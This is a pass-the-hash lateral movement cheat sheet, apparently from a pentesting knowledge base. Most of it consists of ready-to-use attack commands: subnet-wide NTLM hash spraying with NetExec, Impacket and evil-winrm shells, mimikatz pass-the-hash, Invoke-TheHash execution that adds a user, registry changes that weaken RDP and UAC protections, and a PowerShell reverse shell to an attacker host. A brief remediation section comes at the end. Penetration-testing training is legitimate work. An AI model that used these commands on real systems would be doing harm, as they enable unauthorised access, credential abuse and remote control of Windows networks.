🛡️ Methodology Checklist
- Obtain NTLM hash (SAM, LSASS, NTDS dump)
- NXC spray across subnet:
nxc smb [SUBNET]/24 -u [USER] -H [HASH] --local-auth - Look for
(Pwn3d!)indicating local admin - Shell via Impacket:
impacket-psexec [DOMAIN]/[USER]@[TARGET] -hashes :[HASH] - WinRM:
evil-winrm -i [TARGET] -u [USER] -H [HASH] - If PtH blocked: check whether SMB signing is enforced on target
- Spray hash against domain accounts to find reuse
🎯 Operational Context
Use when: NTLM hash obtained — authenticate to Windows services (SMB, WinRM, RDP with NLA disabled) without cracking the plaintext password.
Think Dumber First: nxc smb [SUBNET]/24 -u Administrator -H [NTLM_HASH] --local-auth — sweeps entire subnet with the hash. Anything that shows Pwn3d! is accessible. Then nxc smb [TARGET] -u Administrator -H [HASH] -x 'whoami' for command execution.
Skip when: Target enforces Kerberos-only — NTLM disabled, PtH fails; use PtT instead.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
impacket-psexec [USER]@[TARGET_IP] -hashes :[NT_HASH] | PsExec shell via hash (requires ADMIN$ write) |
impacket-smbexec [USER]@[TARGET_IP] -hashes :[NT_HASH] | SMBExec shell via hash |
impacket-wmiexec [USER]@[TARGET_IP] -hashes :[NT_HASH] | WMIExec shell via hash (stealthier, no service created) |
netexec smb [SUBNET]/24 -u [USER] -d . -H [NT_HASH] | Spray hash across subnet, find Pwn3d! hosts |
netexec smb [TARGET_IP] -u [USER] -d . -H [NT_HASH] -x whoami | Execute command via hash |
evil-winrm -i [TARGET_IP] -u [USER] -H [NT_HASH] | WinRM shell via hash |
xfreerdp /v:[TARGET_IP] /u:[USER] /pth:[NT_HASH] | RDP via hash (requires RestrictedAdmin mode) |
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f | Enable RestrictedAdmin mode for RDP PtH |
mimikatz.exe "privilege::debug" "sekurlsa::pth /user:[USER] /rc4:[NT_HASH] /domain:[DOMAIN] /run:cmd.exe" exit | PtH from Windows — spawn process as victim user |
Invoke-SMBExec -Target [TARGET_IP] -Domain [DOMAIN] -Username [USER] -Hash [NT_HASH] -Command "net user mark Pass /add" | PowerShell SMB exec using hash (Invoke-TheHash) |
Invoke-WMIExec -Target [TARGET_IP] -Domain [DOMAIN] -Username [USER] -Hash [NT_HASH] -Command "powershell -enc [BASE64]" | WMI exec via hash — stealthier than SMB |
🔬 Deep Dive & Workflow
How PtH Works
NTLM authentication uses the hash directly as the proof of identity — the protocol never requires the plaintext password to be derived. Capturing a valid NT hash is sufficient to authenticate as that user against any NTLM-speaking service.
Requirements:
- Valid NT hash (RC4)
- Target service accessible via SMB (445) or WinRM (5985/5986)
- For most methods: administrative privileges on target
Tool Selection Matrix
| Scenario | Tool | Notes |
|---|---|---|
| Quick shell from Linux | impacket-psexec | Requires ADMIN$ write access |
| Stealthy exec from Linux | impacket-wmiexec | No service created, quieter |
| Subnet discovery | netexec smb | Look for (Pwn3d!) in output |
| WinRM access | evil-winrm -H | Also works for non-admin if in “Remote Management Users” |
| RDP access | xfreerdp /pth: | Needs RestrictedAdmin enabled |
| From Windows | mimikatz sekurlsa::pth | Spawns process in victim’s context |
| Remote exec from Windows | Invoke-TheHash | Supports WMI (stealthier) and SMB |
UAC Restriction on Local Accounts
| Account Type | PtH Works? |
|---|---|
| Domain accounts | Yes, always |
| Built-in Administrator (RID 500) | Yes, always |
| Other local admins | No, unless LocalAccountTokenFilterPolicy = 1 |
Fix for local admin PtH:
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /fReverse Shell via Invoke-TheHash (Correct Encoding)
Online payload generators often produce wrongly encoded Base64. Generate UTF-16LE locally:
$cmd = '$c=New-Object System.Net.Sockets.TcpClient("[LHOST]",4444);$s=$c.GetStream();...'
$bytes = [System.Text.Encoding]::Unicode.GetBytes($cmd)
$encoded = [Convert]::ToBase64String($bytes)
Write-Host "powershell -EncodedCommand $encoded"Then use that output as the -Command parameter.
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| PtH returns STATUS_LOGON_FAILURE | Hash invalid or account restricted | Verify hash format: LM:NTLM (32 chars each); check if account is disabled or locked |
| nxc PtH works but psexec fails | WritableAdmin share required | psexec needs ADMIN writable; try nxc smb [TARGET] -H [HASH] -x cmd |
| PtH fails on domain account | Restricted Admin mode | Enable: reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0 |
| evil-winrm PtH fails | WinRM not enabled | Check: nxc winrm [TARGET] -u [USER] -H [HASH]; WinRM must be running on target |
| RDP PtH fails | NLA blocks hash auth | Disable NLA or use nxc rdp [TARGET] -u [USER] -H [HASH] --rdp-timeout 10 — PtH with RDP requires NLA disabled |
📝 Reporting Trigger
Finding Title: Pass-the-Hash Lateral Movement Across Multiple Systems Impact: NTLM hash reuse allows authenticating to all systems sharing the same local administrator password hash without cracking, enabling rapid lateral movement across the entire network segment if LAPS is not deployed. Root Cause: Local administrator password reuse without LAPS. NTLM authentication accepted by target systems without additional controls. Recommendation: Deploy LAPS immediately to randomize local admin passwords. Enable Credential Guard to prevent NTLM hash extraction. Consider disabling NTLM entirely and enforcing Kerberos. Alert on lateral movement patterns via Microsoft Defender for Identity.